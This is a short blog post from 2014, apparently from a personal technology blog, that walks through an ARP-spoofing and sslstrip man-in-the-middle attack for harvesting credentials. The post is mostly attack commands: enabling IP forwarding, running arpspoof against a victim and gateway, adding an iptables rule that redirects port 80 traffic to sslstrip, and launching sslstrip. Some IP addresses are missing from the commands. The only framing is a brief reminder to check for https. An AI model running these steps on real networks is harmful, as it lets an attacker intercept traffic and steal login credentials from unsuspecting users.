Computers, Programming, Technology, Music, Literature

Archive for the ‘ssl’ Category

Devouring Security: Sslstrip and arpspoofing for credential harvesting

leave a comment »




You may think you are connecting to a website over ssl, but did you forget to check https at the address bar?



Victim – Windows 7 –

Attacker – Kali linux –


arpspoof gateway –



•Flip your machine into forwarding mode.

echo "1" > /proc/sys/net/ipv4/ip_forward


•Run arpspoof to convince a network they should send their traffic to you.

arpspoof -i <interface> -t <targetIP> <gatewayIP>


arpspoof -i eth0 -t


•Setup iptables to redirect HTTP traffic to sslstrip.

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>


iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000


•Run sslstrip. -l <listenPort>





Written by gmaran23

July 4, 2014 at 8:58 pm